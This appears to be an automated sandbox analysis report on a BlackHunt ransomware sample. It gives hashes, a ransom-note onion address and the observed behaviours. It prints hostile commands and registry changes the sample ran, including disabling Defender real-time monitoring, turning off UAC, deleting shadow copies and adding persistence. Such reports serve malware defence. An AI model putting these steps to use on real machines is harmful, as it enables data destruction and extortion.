Analysis
-
max time kernel
152s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:33
Static task
static1
Behavioral task
behavioral1
Sample
fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe
Resource
win10v2004-20231215-en
General
-
Target
fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe
-
Size
707KB
-
MD5
715e1ab3682b084f5e9b12a9c8452757
-
SHA1
9f27ad7ef3a4de1afcc73c6dda57bd35c31c6a3e
-
SHA256
fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6
-
SHA512
29f99ec0c6569581151df5377e8f0c8721df0c7ba92ce490c3adbefb94c3c3168a1a932c6ee8a8bf31b617e07a05bf7119f5b1c352c1cfe593125edeb75f11f2
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1R80vnh:6uaTmkZJ+naie5OTamgEoKxLWkKh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5372 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3044 bcdedit.exe 4612 bcdedit.exe -
Renames multiple (478) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 4468 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\G: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\V: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\X: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\P: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\O: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\H: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\Z: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\Y: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\R: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\K: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\M: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\Q: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\B: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\A: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\S: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\U: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\J: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\L: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\N: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened (read-only) \??\T: fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\gu.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\dnsns.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\#BlackHunt_ReadMe.hta fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.cpl fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\COPYRIGHT fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xmlresolver.md fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\profile.jfc fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\javaws.policy fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\Welcome.html fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\sunjce_provider.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\7-Zip\License.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jsse.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jre-1.8\bin\#BlackHunt_ReadMe.hta fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunjce_provider.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\psfont.properties.ja fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_Private.key fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#BlackHunt_Private.key fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_ReadMe.hta fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.hta fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_ReadMe.hta fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management-agent.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\cryptix.md fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#BlackHunt_Private.key fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jre-1.8\#BlackHunt_ReadMe.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jre-1.8\legal\#BlackHunt_ReadMe.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\GetGrant.zip fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\access-bridge-64.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\trusted.libraries fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\thaidict.md fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\jcup.md fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\[email protected] fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jre-1.8\lib\security\#BlackHunt_ReadMe.hta fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\BlockInitialize.xlt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_ReadMe.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\localedata.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkDrop32x32.gif fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\cldr.md fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\blacklist fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\local_policy.jar fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightDemiBold.ttf fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\cacerts fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightRegular.ttf fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_Private.key fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_es.properties fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\#BlackHunt_ReadMe.hta fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.txt fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jopt-simple.md fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2284 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4852 vssadmin.exe 4492 vssadmin.exe 1588 vssadmin.exe 3432 vssadmin.exe 2512 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Token: SeRestorePrivilege 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Token: SeBackupPrivilege 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Token: SeTakeOwnershipPrivilege 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Token: SeAuditPrivilege 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Token: SeSecurityPrivilege 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Token: SeIncBasePriorityPrivilege 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Token: SeBackupPrivilege 1348 vssvc.exe Token: SeRestorePrivilege 1348 vssvc.exe Token: SeAuditPrivilege 1348 vssvc.exe Token: SeBackupPrivilege 4836 wbengine.exe Token: SeRestorePrivilege 4836 wbengine.exe Token: SeSecurityPrivilege 4836 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4864 wrote to memory of 720 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 92 PID 4864 wrote to memory of 720 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 92 PID 4864 wrote to memory of 2320 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 93 PID 4864 wrote to memory of 2320 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 93 PID 4864 wrote to memory of 3196 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 96 PID 4864 wrote to memory of 3196 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 96 PID 4864 wrote to memory of 4876 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 99 PID 4864 wrote to memory of 4876 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 99 PID 4864 wrote to memory of 836 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 100 PID 4864 wrote to memory of 836 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 100 PID 720 wrote to memory of 1484 720 cmd.exe 102 PID 2320 wrote to memory of 4968 2320 cmd.exe 103 PID 720 wrote to memory of 1484 720 cmd.exe 102 PID 2320 wrote to memory of 4968 2320 cmd.exe 103 PID 4876 wrote to memory of 3964 4876 cmd.exe 106 PID 4876 wrote to memory of 3964 4876 cmd.exe 106 PID 3196 wrote to memory of 1376 3196 cmd.exe 105 PID 3196 wrote to memory of 1376 3196 cmd.exe 105 PID 836 wrote to memory of 4152 836 cmd.exe 104 PID 836 wrote to memory of 4152 836 cmd.exe 104 PID 4864 wrote to memory of 4948 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 107 PID 4864 wrote to memory of 4948 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 107 PID 4864 wrote to memory of 4696 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 109 PID 4864 wrote to memory of 4696 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 109 PID 4864 wrote to memory of 3956 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 112 PID 4864 wrote to memory of 3956 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 112 PID 4864 wrote to memory of 2828 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 111 PID 4864 wrote to memory of 2828 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 111 PID 4864 wrote to memory of 2372 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 115 PID 4864 wrote to memory of 2372 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 115 PID 4864 wrote to memory of 4836 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 117 PID 4864 wrote to memory of 4836 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 117 PID 4864 wrote to memory of 1032 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 116 PID 4864 wrote to memory of 1032 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 116 PID 4864 wrote to memory of 3840 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 121 PID 4864 wrote to memory of 3840 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 121 PID 4864 wrote to memory of 3604 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 125 PID 4864 wrote to memory of 3604 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 125 PID 4864 wrote to memory of 4120 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 122 PID 4864 wrote to memory of 4120 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 122 PID 4948 wrote to memory of 2672 4948 cmd.exe 127 PID 4948 wrote to memory of 2672 4948 cmd.exe 127 PID 4864 wrote to memory of 1168 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 128 PID 4864 wrote to memory of 1168 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 128 PID 4696 wrote to memory of 1552 4696 cmd.exe 136 PID 4696 wrote to memory of 1552 4696 cmd.exe 136 PID 3956 wrote to memory of 3352 3956 cmd.exe 135 PID 3956 wrote to memory of 3352 3956 cmd.exe 135 PID 4864 wrote to memory of 3556 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 134 PID 4864 wrote to memory of 3556 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 134 PID 4836 wrote to memory of 2076 4836 cmd.exe 130 PID 4836 wrote to memory of 2076 4836 cmd.exe 130 PID 1032 wrote to memory of 1056 1032 Process not Found 131 PID 1032 wrote to memory of 1056 1032 Process not Found 131 PID 4864 wrote to memory of 4896 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 133 PID 4864 wrote to memory of 4896 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 133 PID 2828 wrote to memory of 2272 2828 cmd.exe 185 PID 2828 wrote to memory of 2272 2828 cmd.exe 185 PID 4864 wrote to memory of 4424 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 138 PID 4864 wrote to memory of 4424 4864 fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe 138 PID 2372 wrote to memory of 2336 2372 cmd.exe 186 PID 2372 wrote to memory of 2336 2372 cmd.exe 186 PID 3604 wrote to memory of 2768 3604 cmd.exe 142 PID 3604 wrote to memory of 2768 3604 cmd.exe 142 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe"C:\Users\Admin\AppData\Local\Temp\fea7cbe6859a861531dfada3a0d7b8c9142fad58636e30b747ae9694d175a0a6.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4864 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3964
-
-
-
